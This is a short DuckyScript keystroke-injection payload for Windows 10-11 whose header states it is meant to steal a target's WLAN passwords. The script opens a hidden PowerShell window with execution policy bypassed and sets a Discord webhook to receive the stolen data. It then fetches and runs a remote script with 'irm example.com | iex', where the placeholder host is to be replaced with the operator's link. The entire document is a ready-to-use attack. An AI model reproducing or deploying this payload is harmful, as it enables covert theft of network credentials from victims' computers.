REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
REM # Author       : Aleff                                            |
REM # Description: A script used to stole target WLAN Passwords.      |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 1.0                                              |
REM #                                                                 |
REM ###################################################################

REM REQUIRED - Provide Discord Webhook
DEFINE DISCORD YOUR-DISCORD-WEBHOOK

DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='
STRING DISCORD

REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
STRINGLN ';irm example.com | iex
